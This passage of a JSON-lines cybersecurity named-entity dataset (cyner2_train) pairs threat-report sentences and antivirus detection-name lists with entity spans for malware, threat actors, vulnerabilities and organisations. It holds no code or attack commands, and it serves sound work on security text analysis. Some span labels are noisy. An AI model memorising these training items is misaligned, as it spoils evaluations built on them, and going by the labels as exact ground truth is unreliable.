Trojan.Hacktool.Httptunnel.A W32/Tool.UFFD-0015 TROJ_HTTPTUNE.A Trojan.Hacktool.Httptunnel.A 
HackTool.Win32.HTTPTunnel Riskware.Win32.HTTPTunnel.hskj HackTool.W32.HTTPTunnel!c Trojan.Hacktool.Httptunnel.A Application.Win32.HackTool.HTTPTunnel BehavesLike.Win32.PUP.nz W32/HackTool.EG Hacktool.HttpTunnel W32.Hack.Tool HackTool/Win32.HTTPTunnel HackTool.Win32.HTTPTunnel Win32/HackTool.HTTPTunnel Win32.Hacktool.Httptunnel.Ljul", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001824", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Trojan.KGEI-2537 Trojan-Spy.Win32.Alinaos.as Trojan.Win32.Z.Zusy.575488.M BehavesLike.Win32.Trojan.hc Trojan.MSIL.Krypt Trojan.Zusy.D3371D Trojan/Win32.Inject.C1647442 Trojan-Spy.Win32.Alinaos.as Trojan:MSIL/Proseus.A!bit Trj/CI.A Msil.Trojan.Dropper.Sxdx Win32/Trojan.Dropper.6f6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001826", "source": "cyner2_train"}} {"text": "These attacks caused significant financial impact for major cryptocurrency markets, with one cryptocurrency cloud provider losing over $12 million in assets, allegedly to ITG03.", "spans": {"ORGANIZATION: cryptocurrency markets,": [[60, 83]], "ORGANIZATION: cryptocurrency cloud provider": [[93, 122]], "THREAT_ACTOR: ITG03.": [[171, 177]]}, "info": {"id": "cyner2_train_001828", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Win32.Delf!O Worm.Zorin W32.Looked.P Win32/Looked.C PE_LEOX.A Worm.Win32.Zorin.a Trojan.Win32.Zorin.wmfe W32.W.Viking.l3Va Virus.Win32.Zorin.a Win32.HLLW.Looked Virus.Delf.Win32.16 PE_LEOX.A BehavesLike.Win32.Backdoor.lh Worm.Win32.Viking W32/Zorin.A Worm/Zorin.a Virus/Win32.Delf.dpee Worm.Logo.f.67072 Worm:Win32/Zorin.A Worm.Win32.A.Zorin.67072 Worm.Win32.Zorin.a Win32/Zorin.67072 Trojan.Delf.62976 Win32/Viking.NAI Worm.Zorin.A W32/Zorin.A.worm Win32/Worm.Zorin.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001829", "source": "cyner2_train"}} {"text": "The focus of the Android banking malware in Google Play is different from 
any other Android malware we have investigated.", "spans": {"MALWARE: Android banking malware": [[17, 40]], "SYSTEM: Google Play": [[44, 55]], "MALWARE: Android malware": [[84, 99]]}, "info": {"id": "cyner2_train_001830", "source": "cyner2_train"}} {"text": "Actually, this is not the first ransomware to come out of Brazil.", "spans": {"MALWARE: ransomware": [[32, 42]]}, "info": {"id": "cyner2_train_001832", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.12356.C TrojanPSW.OnLineGames.gyv Trojan.DL.Hover!hoKEWysDbsk W32/Packed_Upack.A Trojan.Onlinegames-2021 Trojan-Downloader.Win32.Hover.ae Heur.Packed.Unknown Trojan.AVKill.425 TR/CHover.AE Trojan/PSW.OnLineGames.aogk TrojanDownloader:Win32/Idicaf.C Win-Trojan/OnlineGameHack.12356.D Trojan-PSW.Win32.OnLineGames.alse HeurEngine.ZeroDayThreat W32/OnLineGames.ALSE!tr.pws PSW.OnlineGames.ATXK Trj/Lineage.KMQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001833", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Nsis.hgnwk TROJ_SPNR.07JB11 Trj/CI.A Win32.Troj.DeepScan.x.kcloud Trojan:Win32/Sinis.C W32/Bfr.CV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001834", "source": "cyner2_train"}} {"text": "Unit 42 has uncovered a new campaign from the CozyDuke threat actors, aka CozyCar leveraging malware that appears to be related to the Seaduke malware described earlier this week by Symantec.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: campaign": [[28, 36]], "THREAT_ACTOR: CozyDuke threat": [[46, 61]], "THREAT_ACTOR: CozyCar": [[74, 81]], "MALWARE: malware": [[93, 100]], "MALWARE: Seaduke malware": [[135, 150]], "ORGANIZATION: Symantec.": [[182, 191]]}, "info": {"id": "cyner2_train_001835", "source": "cyner2_train"}} {"text": "It leaves a ransom note with the following filename: !!! 
how to decrypt files !!!.txt", "spans": {"MALWARE: ransom": [[12, 18]]}, "info": {"id": "cyner2_train_001837", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader/W32.Mutant.32128 TrojanDownloader.Mutant.aim Trojan.DR.Wigon.K Win32/Wigon.CK W32/Trojan3.GG Trojan.Pandex W32/DLoader.JDXM Trojan.Downloader-55828 Trojan-Downloader.Win32.Mutant.aim Trojan.Downloader.Wigon.A TrojWare.Win32.Wigon.CK Trojan-Downloader.Win32.Mutant.aim Trojan.Rntm.10 Win32/Wigon.CK W32/Trojan3.GG TrojanDropper:Win32/Cutwail.AG Trojan.Downloader.Wigon.A Trojan.Pandex.ILG Trojan.Win32.Undef.qqp Trojan-Dropper.Cutwail BackDoor.Ntrootkit Trj/BedeTres.R", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001838", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropped:Trojan.Spy.Delf.PY Backdoor.Win32.Swz!O Backdoor/Swz.c Trojan.Spy.Delf.PY Win32.Trojan.WisdomEyes.16070401.9500.9990 W32/Trojan.XFMU-4902 TSPY_DELF.EGM Win.Spyware.3595-2 Backdoor.Win32.Swz.c Dropped:Trojan.Spy.Delf.PY Trojan.Win32.Swz.bcbdrt Dropped:Trojan.Spy.Delf.PY TrojWare.Win32.Dialer.LA Dropped:Trojan.Spy.Delf.PY Trojan.DownLoader.18593 TSPY_DELF.EGM BehavesLike.Win32.HLLP.dh Trojan-Dropper.Delf W32/Trojan.YLD Backdoor/Delf.sn Trojan[Backdoor]/Win32.Swz Backdoor.Win32.Hupigon.159240 Backdoor.Win32.Swz.c Dropped:Trojan.Spy.Delf.PY Trojan/Win32.Llac.R36500 Dropped:Trojan.Spy.Delf.PY Backdoor.Win32.Hupigon.axbc TrojanSpy.Delf!ehn0gq0J77k", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001840", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9955 BKDR_ZEGOST.SM17 Trojan.Win32.FBOK.exmdmr TR/Crypt.Xpack.drajw Trojan.Johnnie.D15B42 Trojan:Win32/Redosdru.AB Trj/GdSda.A Win32/Backdoor.d55", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001841", "source": "cyner2_train"}} {"text": "A Mumblehard infected server opens a backdoor for the cybercriminals that allows them 
full control of the system by running arbitrary code.", "spans": {"MALWARE: Mumblehard": [[2, 12]], "THREAT_ACTOR: cybercriminals": [[54, 68]], "VULNERABILITY: arbitrary code.": [[124, 139]]}, "info": {"id": "cyner2_train_001842", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Skeeyah Worm.EternalRocks Win32.Trojan.WisdomEyes.16070401.9500.9972 W32.Eternalrocks Win.Trojan.EternalRocks-6320096-0 Worm.EternalRocks.t Trojan/Win32.Fsysna Trojan:Win32/Eterock.A Win-Trojan/MDA.630F094C Trojan.Fsysna Worm.DoomsDay W32/Eterocks.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001844", "source": "cyner2_train"}} {"text": "In addition to the commoditized EKs, this exploit code has been leveraged in numerous one-shot and gated web-exploitation campaigns, delivered through a mix of the usual malvertising networks and compromised websites.", "spans": {"MALWARE: EKs,": [[32, 36]], "THREAT_ACTOR: gated web-exploitation campaigns,": [[99, 132]]}, "info": {"id": "cyner2_train_001846", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Skeeyah.8391 Trojan.Win32.Drop.bbwlfj Trojan.MulDrop4.627 TR/MiniMal.A.120 Trojan.Graftor.D4750 W32/Redosdru.BED!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001847", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Tinyloader Trojan.Zusy.D258DB Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Tiny.dztpub Trojan.Win32.Tiny TrojanDownloader:Win32/Tinyloader.D Trj/CI.A Win32.Trojan.Crypt.Wrqf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001849", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Orbus.S11689 Trojan.Zusy.DE453 W32/Trojan2.OGNI Backdoor.Salgorea Win32/Tnega.WCBBKMB TROJ_CUEGOE.SM Win.Trojan.Cuegoe-6336261-0 Application.Win32.Amonetize.NE TROJ_CUEGOE.SM W32/Trojan.WOEU-3966 TR/Zusy.htd.1 Trojan.Dropper Trojan.Zusy!G5SenpWt4dI W32/Salgorea.C!tr 
Backdoor.Win32.OceanLotus.X", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001850", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.AutoIt.Zbot.S Win32.Trojan.WisdomEyes.16070401.9500.9823 W32/Trojan.FKJB-3819 Trojan.Win32.Autoit.abnef BehavesLike.Win32.Dropper.bh DR/Autoit.dhgia TrojanDownloader:VBS/Banload.BEP Trojan.Win32.Autoit.abnef Trj/CI.A W32/Injector.DMUI!tr Win32/Trojan.3cd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001851", "source": "cyner2_train"}} {"text": "A backdoor also known as: MSIL.Trojan.Injector.q TrojWare.MSIL.Injector.AB Trojan.Starter.4871 BehavesLike.Win32.Ransomware.ch W32/Trojan.QQTT-3117 Trojan:MSIL/Ranos.A Trojan.Msil Win32/Trojan.ead", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001852", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zusy.D1BC52 Win32.Trojan.WisdomEyes.16070401.9500.9998 Backdoor.Memsyl Trojan.Win32.Inject1.dkmaoo Trojan.Inject1.45689 Trojan.Injector.Win32.256336 Trojan.MSIL.Inject Trojan[Dropper]/Win32.Injector Dropper/Win32.Necurs.R121870 Trojan.JobLaunch.ODB Trj/CI.A Trojan.Injector!pUXRB6SMd/g", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001853", "source": "cyner2_train"}} {"text": "Alibaba researchers then posted an analysis report on the malware, giving it the name XcodeGhost.", "spans": {"ORGANIZATION: Alibaba researchers": [[0, 19]], "MALWARE: malware,": [[58, 66]], "MALWARE: XcodeGhost.": [[86, 97]]}, "info": {"id": "cyner2_train_001854", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.Bayrob.c W32/Trojan.RXRB-1881 Trojan.Win32.Dwn.eeedhz Trojan.Win32.Z.Bayrob.1075712.R Trojan.DownLoader22.1800 BehavesLike.Win32.Trojan.tc TR/Nivdort.knzgo Trojan:Win32/Nivdort.A Trojan.Kazy.DC0934 Trojan/Win32.Nivdort.C1321145 Trojan.Win32.Bayrob W32/Bayrob.BL!tr Win32/Trojan.f19", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_001855", "source": "cyner2_train"}} {"text": "FireEye believes that two actors – Turla and an unknown financially motivated actor – were using the first EPS zero-day CVE-2017-0261, and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege EOP zero-day CVE-2017-0263.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: two actors": [[22, 32]], "THREAT_ACTOR: Turla": [[35, 40]], "THREAT_ACTOR: unknown financially motivated actor": [[48, 83]], "VULNERABILITY: EPS zero-day": [[107, 119], [166, 178]], "THREAT_ACTOR: APT28": [[139, 144]], "VULNERABILITY: Escalation of Privilege EOP zero-day": [[210, 246]]}, "info": {"id": "cyner2_train_001856", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9946 Trojan.Win32.Shifu.aoc Packed.Win32.TDSS.~AA Packed:W32/PeCan.A FDOS.Chalcol BehavesLike.Win32.Virut.cc Dos.Chalcol.a DoS:Win32/Chalcol.A Trojan.Win32.Shifu.aoc DoS.Chalcol Win32/DoS.Chalcol.A Win32.Trojan.Chalcol.Wpsv DoS.Win32.Chalcol Win32/Trojan.DoS.0cc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001859", "source": "cyner2_train"}} {"text": "This vulnerability allows an attacker to escape the Internet Explorer sandbox with a VBScript script and execute an arbitrary binary file downloaded from the Internet.", "spans": {"VULNERABILITY: vulnerability": [[5, 18]], "SYSTEM: Internet Explorer sandbox": [[52, 77]], "MALWARE: arbitrary binary file": [[116, 137]]}, "info": {"id": "cyner2_train_001866", "source": "cyner2_train"}} {"text": "Since first writing about the discovery of HDDCryptor back in September, we have been tracking this ransomware closely as it has evolved.", "spans": {"MALWARE: HDDCryptor": [[43, 53]], "MALWARE: ransomware": [[100, 110]]}, "info": {"id": "cyner2_train_001867", "source": "cyner2_train"}} {"text": "While there are many distinct malware families that scrape unencrypted process memory to obtain cards, some of 
these malware capabilities overlap with generic information stealing trojans such as Flokibot that obtain and exfiltrate HTTPS GET and POST data and other materials from compromised machines.", "spans": {"MALWARE: malware families": [[30, 46]], "VULNERABILITY: unencrypted process memory": [[59, 85]], "MALWARE: malware": [[117, 124]], "MALWARE: trojans": [[180, 187]], "MALWARE: Flokibot": [[196, 204]], "SYSTEM: compromised machines.": [[281, 302]]}, "info": {"id": "cyner2_train_001870", "source": "cyner2_train"}} {"text": "Magnitude EK is notorious for distributing the Cerber ransomware specifically to certain geolocations, and in particular South Korea, via its own gate, called Magnigate.", "spans": {"MALWARE: Magnitude EK": [[0, 12]], "MALWARE: the Cerber ransomware": [[43, 64]], "ORGANIZATION: Magnigate.": [[159, 169]]}, "info": {"id": "cyner2_train_001871", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Bepush.H3 Dropper.Dapato.Win32.26115 Win32.Trojan.WisdomEyes.16070401.9500.9850 TROJ_BEPUSH_EK040412.UVPM Trojan.Win32.Dapato.dzszpp Trojan.Win32.Z.Bepush.943616.C Trojan.DownLoader14.14903 TROJ_BEPUSH_EK040412.UVPM BehavesLike.Win32.Backdoor.dh Trojan.Win32.Bepush TR/Dropper.A.7849 MSIL/Dropper.UTIT!tr Trojan[Dropper]/Win32.Dapato Trojan.Zusy.D262FF Trojan:MSIL/Bepush.H TrojanDropper.Dapato Win32.Trojan-dropper.Dapato.Hsik Trojan.DR.Dapato!MYHy5uvhZGg Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001875", "source": "cyner2_train"}} {"text": "Talos first analyzed this threat in our 2020 blog post, highlighting its large repertoire of modules, multiple methods of spreading, and continuous development.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "MALWARE: threat": [[26, 32]], "MALWARE: repertoire of modules,": [[79, 101]]}, "info": {"id": "cyner2_train_001876", "source": "cyner2_train"}} {"text": "In this situation, the threat actors decided to take advantage of this behavior by using Search Engine 
Optimization SEO to make their malicious links more prevalent in the search results, enabling them to target users with the Zeus Panda banking Trojan.", "spans": {"THREAT_ACTOR: the threat actors": [[19, 36]], "SYSTEM: Search Engine Optimization SEO": [[89, 119]], "ORGANIZATION: users": [[212, 217]], "MALWARE: the Zeus Panda banking Trojan.": [[223, 253]]}, "info": {"id": "cyner2_train_001878", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9976 Trojan.Farfli Win32/Covesmer.AT TROJ_FARFLI.XM Html.Trojan.RootkitVimponey-1 TrojanDownloader:Win32/Vimponey.A Trojan.Win32.Downloader.56320.BV Trojan.NtRootKit.2772 TROJ_FARFLI.XM Trojan.Graftor.D2B9F3 TScope.Malware-Cryptor.SB Win32/Trojan.d21", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001879", "source": "cyner2_train"}} {"text": "In the end, I bring considerations and reflections on OTP Tokens effectiveness as a second factor authentication solution.", "spans": {}, "info": {"id": "cyner2_train_001880", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dropper.Interlac.1.0.B Trojan-Dropper.Win32.Interlac.10!O TrojanDropper.Interlac Dropper.Interlac.Win32.61 Trojan/Dropper.Interlac.10.b TROJ_INTERLAC.B W32/Trojan.PMPA-6139 Win32/Interlaced.10.B Win.Dropper.Delf-619 Backdoor.Bifrose Backdoor.Win32.Bifrose.te Trojan.Dropper.Interlac.1.0.B Trojan.Win32.Delf.hitv Backdoor.Win32.Bifrose.23040.R TrojWare.Win32.TrojanDropper.Interlac.B Trojan.KillFiles Trojan-Dropper.Win32.Interlac.B W32/Trojan.FIF TrojanDropper.Interlac.10.b TR/Drop.Inte.10.b.3 Trojan[Backdoor]/MSIL.Bladabindi.as TrojanDropper:Win32/Interlac.B Trojan.Dropper.Interlac.1.0.B Backdoor.Win32.Bifrose.te Trojan.Dropper.Interlac.1.0.B Trojan/Win32.KillFiles.C37985 Trojan.Dropper.Interlac.1.0.B Trojan.Dropper.Interlac.1.0.B Trj/Interlac.A Win32/TrojanDropper.Interlac.10.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001883", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: W32.Rycii.Worm Worm/W32.Nency.229376 Worm.Win32.VB!O Worm.VB.Win32.295 Trojan.Heur.EE8D5F Win32.Trojan.WisdomEyes.16070401.9500.9987 Win32/Shur.A WORM_VB.FNX Worm.Win32.VB.cj Trojan.Win32.VB.ntmf Worm.Win32.VB.229376.D Worm.Win32.VB.~FF Win32.HLLW.Brontok WORM_VB.FNX BehavesLike.Win32.Vilsel.dm Worm.Win32.VB Worm/VB.ca WORM/Bugus.A Worm/Win32.VB.cj Worm.VB.cj.kcloud Trojan:Win32/Brontok.A Worm.Win32.VB.cj Trojan.VBRA.08344 I-Worm.VB.CJ Win32.Worm.Vb.Pkhb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001885", "source": "cyner2_train"}} {"text": "Changes include an increase in the quantity of injection varieties, as well as payloads deviating from the standard SocGholish Fake Update JavaScript packages.", "spans": {"MALWARE: payloads": [[79, 87]], "MALWARE: the standard SocGholish Fake Update JavaScript packages.": [[103, 159]]}, "info": {"id": "cyner2_train_001886", "source": "cyner2_train"}} {"text": "In addition we were also able to resolve the hosting IP 212.192.14.3 as well as the ASN AS39144 located in the United Kingdom to all registered domains.", "spans": {}, "info": {"id": "cyner2_train_001887", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9526 Win.Worm.VB-698 BehavesLike.Win32.Autorun.dt W32.W.Otwycal.l4av Win32/RiskWare.PEMalform.E Trojan-Banker.Win32.Bancos", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001888", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Opanki.worm Backdoor.SDBot W32.W.Pakes!c Win32.Trojan.WisdomEyes.16070401.9500.9915 W32/Opanki.AY Backdoor.Sdbot Win.Trojan.Pakes-927 Backdoor.Win32.IRCBot.cq Trojan.Win32.Pakes.flbf Worm.Win32.IM-Pakes.150528 Worm.Win32.Oscarbot.BL BackDoor.IRC.Sdbot.170 Worm.Pakes.Win32.1 BehavesLike.Win32.Sdbot.cc W32/Opanki.NEXW-4186 Backdoor/IRCBot.etu WORM/Pakes.A Worm.Pakes.kcloud Backdoor.Win32.IRCBot.cq Worm/Win32.IRCBot.C2420 
SScope.Backdoor.Sdbot Backdoor.SDBot Trj/Pakes.EB Win32/Oscarbot.BL Win32.Worm-im.Pakes.Aexo Worm.IRCBot!NcS/fGqoMio Backdoor.Win32.Aimbot W32/Opanki!worm.im", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001889", "source": "cyner2_train"}} {"text": "At the time of that discovery, the latest versions we had seen were 1.5.x, months before.", "spans": {}, "info": {"id": "cyner2_train_001890", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/PSW.Sagic.15.d Win32/PSW.Sagic.15.D W32/Packed_Mew.C TSPY_SAGIC.X Win32.Stration Trojan.Spy-6657 TrojWare.Win32.PSW.Sagic.D Trojan.DownLoader.5739 TR/PSW.Sagic.F Win32/Sagic.F PWS:Win32/Sagic.F Trojan.PSW.Sagic.15.e W32/Sagic.D!tr.pws Trj/Sagic.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001892", "source": "cyner2_train"}} {"text": "This is the first time that we have seen Cerber distributed via the use of WSFs.", "spans": {"MALWARE: Cerber": [[41, 47]]}, "info": {"id": "cyner2_train_001894", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Goicu.A BackDoor-ANF.cli BKDR_NETTROJAN.A BKDR_NETTROJAN.A Win.Trojan.Nettrojan-1 Backdoor.Goicu.A Backdoor.Win32.NetTrojan Backdoor.Goicu.A Trojan.Win32.NetTrojan.bhgtue Backdoor.Win32.NetTrojan.518144 Backdoor.W32.NetTroj!c Backdoor.Goicu.A Backdoor.Win32.DNetTrojan.A Backdoor.Goicu.A Backdoor.NetTrojan.Win32.4 BackDoor-ANF.cli W32/Risk.VTVG-6810 Trojan/NetTrojan.c BDC/NetTrojan.Cli Trojan[Backdoor]/Win32.NetTrojan Backdoor.Goicu.A Backdoor.Win32.NetTrojan Backdoor.Goicu.A Win32/DNetTrojan.A Win32.Backdoor.Nettrojan.Tcmd Backdoor.ANF.A W32/BDoor.NetTrojan!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001895", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zusy.D36A22 Win32.Trojan.WisdomEyes.16070401.9500.9942 Backdoor:MSIL/Draliz.A Trj/GdSda.A PUA.MSIL.NetSeal", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_001896", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.KotispaLTL.Trojan Trojan/Glupteba.ao W32/Trojan2.PAMI HT_GLUPTEBA_GA310456.UVPM Win32.Trojan-Downloader.Glupteba.A Trojan.Win32.Glupteba.egxnjb Trojan.Glupteba.Win32.3453 HT_GLUPTEBA_GA310456.UVPM W32/Trojan.NEJE-6779 TrojanProxy.Glupteba.vg TR/ATRAPS.hbngn Trojan[Proxy]/Win32.Glupteba Trojan.Zusy.D33746 Trojan/Win32.Glupteba.C1592487 TrojanProxy.Glupteba Trj/GdSda.A Trojan.PR.Glupteba! Trojan.Win32.Glupteba W32/Glupteba.AO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001897", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Sabresac.A5 Adware.Elex Trojan.Sabres.Win32.1 Troj.W32.Excalibur.tnrv Trojan/Sabresac.a Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Sabres.h TrojWare.Win32.Excalibur.A BehavesLike.Win32.Adware.fm Adware.Elex/Variant Trojan.Win32.Sabres.h Trojan.Excalibur Trj/GdSda.A Trojan.Zusy.D2E5F4 Win32.Trojan.Sabres.Aenw Trojan.Win32.Sabresac Win32/Trojan.6a0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001898", "source": "cyner2_train"}} {"text": "As the development phase supposedly ended, malware started spreading from India, the United States and Israel to other countries around the globe.", "spans": {"MALWARE: malware": [[43, 50]]}, "info": {"id": "cyner2_train_001899", "source": "cyner2_train"}} {"text": "In recent years, the AgentTesla secret-stealing Trojan has continued to be active, and Antiy CERT has repeatedly monitored attacks targeting domestic government, enterprise institutions, and colleges and universities to deliver this secret-stealing Trojan.", "spans": {"MALWARE: the AgentTesla secret-stealing Trojan": [[17, 54]], "ORGANIZATION: Antiy CERT": [[87, 97]], "ORGANIZATION: domestic government, enterprise institutions,": [[141, 186]], "ORGANIZATION: colleges": [[191, 199]], "ORGANIZATION: universities": [[204, 216]], "MALWARE: secret-stealing Trojan.": [[233, 
256]]}, "info": {"id": "cyner2_train_001900", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.1938 W32.Virut.CF Win32/Virut.17408 PE_VIRUX.Q Win.Trojan.Virut-377 Virus.Win32.Virut.q Virus.Win32.Virut.hpeg W32.Virut.l5he Virus.Win32.Virut.Ce Win32.Virut.5 PE_VIRUX.Q Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.cr.61440 Virus:Win32/Virut.BN Virus.Win32.Virut.q Win32/Virut.F Virus.Virut.13 Win32/Virut.NBP Backdoor.Win32.DsBot W32/Virut.CE W32/Sality.AO Win32/Virus.VirutChangeEntry.H", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001902", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.MspassHDK.Trojan Abuse-Worry/W32.Messen.64000 PSWTool.Win32.Messen!O Trojan.Passviewc Win32.Trojan.WisdomEyes.16070401.9500.9571 W32/Trojan.RJEU-3073 not-a-virus:HEUR:PSWTool.Win32.PassView.c Riskware.Win32.Messen.wcor Trojan.Inject1.34913 Tool.Messen.Win32.113 W32/Trojan2.GXAC TrojanDropper.Injector.bilf Trojan[PSWTool]/Win32.Messen Application.Heur.ED65B4 Trojan.Win32.PSWIMMultiPass.61996 not-a-virus:HEUR:PSWTool.Win32.PassView.c Unwanted/Win32.Messenpass.R46038 PUP.Optional.MessenPass Riskware.PSWTool! 
Win32/Application.BO.08a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001903", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesLT031012KGHN.Worm Worm.Win32.AutoRun!O Trojan.Finodes.BB5 W32/Autorun.worm.ht Worm.AutoRun Worm.AutoRun.Win32.46218 Trojan.Strictor.DEE4 W32.SillyFDC Win.Worm.Autorun-10000 Worm.Win32.AutoRun.cxps Trojan.Win32.AutoRun.rfaml Worm.Win32.A.AutoRun.117760.W Trojan.Win32.FakeFolder.bbc Win32.HLLW.Autoruner1.889 BehavesLike.Win32.PWSZbot.dz Worm/AutoRun.ahpl TR/Finodes.B.406 Worm/Win32.AutoRun Trojan:Win32/Finodes.B Worm.Win32.AutoRun.cxps Worm/Win32.AutoRun.R22156 Worm.AutoRun Trojan.Zusy Worm.AutoRun!7DcK6jk8E7A Worm.Win32.AutoRun W32/Autorun.CXP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001906", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.P2P.Tibick.D W32/Tibick.d Worm.P2P.Tibick!vdEsmQVVXQU W32/Tibick.C@p2p W32.Tibick W32/Tibick.C Win32/Tibick.E WORM_TIBICK.F P2P-Worm.Win32.Tibick.d Win32.Worm.P2P.Tibick.D Worm.Win32.Tibick.36222 Worm.Win32.Tibick.D Win32.Worm.P2P.Tibick.D Win32.HLLW.Tibic Worm/Tibick.d WORM_TIBICK.F P2P-Worm.Win32.Tibick.D!IK Worm/P2P.Tibick.c Worm:Win32/Tibick.D Win32.Worm.P2P.Tibick.D W32/Tibick.C@p2p Win32/Tibick.worm.36248 Win32/Tibick.D Worm.P2p.Tibick.f P2P-Worm.Win32.Tibick.D W32/Tibick.C!worm.p2p Worm/Tibick.E W32/Tibick.B.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001907", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnlineGameWRAL.Trojan Win32.Trojan.WisdomEyes.16070401.9500.9976 W32/Trojan.PUJS-2392 Win32/Cropo.A Win.Trojan.Small-7581 Trojan.KillProc.1539 W32/Trojan.BXFW Trj/SmallProxy.AB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001908", "source": "cyner2_train"}} {"text": "This email was then forwarded to several people, with the malicious Excel file attached.", "spans": {"ORGANIZATION: several people,": 
[[33, 48]], "MALWARE: malicious": [[58, 67]]}, "info": {"id": "cyner2_train_001909", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.CB0B Backdoor.RCServ Backdoor.RCServ.Win32.44 Backdoor.W32.Rcserv!c Backdoor/RCServ.c Backdoor.RCServ Win.Trojan.RCServ-1 Backdoor.RCServ Backdoor.Win32.RCServ.c Trojan.Win32.RCServ.dmhw Backdoor.Win32.A.RCServ.404480[UPX] BackDoor.RC BehavesLike.Win32.Downloader.cc Backdoor:Win32/RCServ.C Backdoor.Win32.RCServ.c Bck/RCServ.L Win32.Backdoor.Rcserv.Lohl Backdoor.RCServ!QJAExtCJ+QQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001912", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.PDF.AC Exp.SWF.CVE-2012-0754 Exploit.PDF.AC Trojan.Pidief SWF/Exploit.CVE-2011-0611.C TROJ_PIDIEF.SMBD Exploit.JS.Pdfka.dqw Exploit.PDF.AC PDF.Z.CVE-2011-0611.411562.A[h] 